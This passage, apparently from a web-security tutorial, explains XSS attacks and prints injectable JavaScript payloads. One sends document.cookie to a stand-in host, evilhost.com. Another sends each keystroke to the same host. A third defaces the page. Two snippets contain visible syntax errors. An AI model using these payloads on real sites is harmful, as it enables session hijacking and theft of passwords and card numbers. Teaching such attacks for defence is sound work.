Hackers have been very creative when exploiting the XSS flaw and with the help of JavaScript, the attack possibilities increase. XSS combined with JavaScript can be used for the following types of attacks:
Let's discuss a few examples.
In every discussion of XSS attack, the first thing that we talk about is how cookies can be compromised using XSS and JavaScript. The stolen cookie can then be used by the attacker to impersonate the victim for the duration of the session until the user logs out of the application.
The document.cookie property of the HTML DOM returns the values of all cookies assigned to the current session. For example, the attacker can inject the following script in a comments section of a website vulnerable to a XSS attack:
<script language="Javascript"> Document.location='http://www.evilhost.com/cookielogger.php?cookie= '+document.cookie; </script>
When a user views the web page, the comments are also downloaded. This includes the preceding script that would send the cookie to the evilhost.com server under the control of the attacker.
The attacker can also gather all the keystrokes of the victim by injecting a JavaScript that would log everything the user types such as password, credit card numbers, and so on, and then send it across to a server under his or her control.
A sample script that would log all keystrokes is shown here:
<script> document.onkeypress = function(e) var img = new Image(); img.src='http://www.evilhost.com/keylogger.php?data='+e.which; </script>
Whenever the user presses a key, the onkeypress event is triggered. In the preceding script, an object by the name e is created for every key that is pressed. The which keyword is a property of the object e, which stores the key code of the key that is pressed.
Website defacing is an attack on the website that changes the visual appearance of the website. These attacks are mostly done by hacktivists who want to promote their agenda. The document.body.innerHTML property allows JavaScript to manipulate the contents of the loaded HTML page. This feature was created for legitimate purpose, but like all things, it can also be used by attacker to with a malicious intent and in this case, it is being used to deface the web page.
By injecting the following script, the contents of the current page will be replaced with the THIS WEBSITE IS UNDER ATTACK text:
<script> document.body.innerHTML="<div style=visibility:visible;><h1>THIS WEBSITE IS UNDER ATTACK</h1></div>"; </script>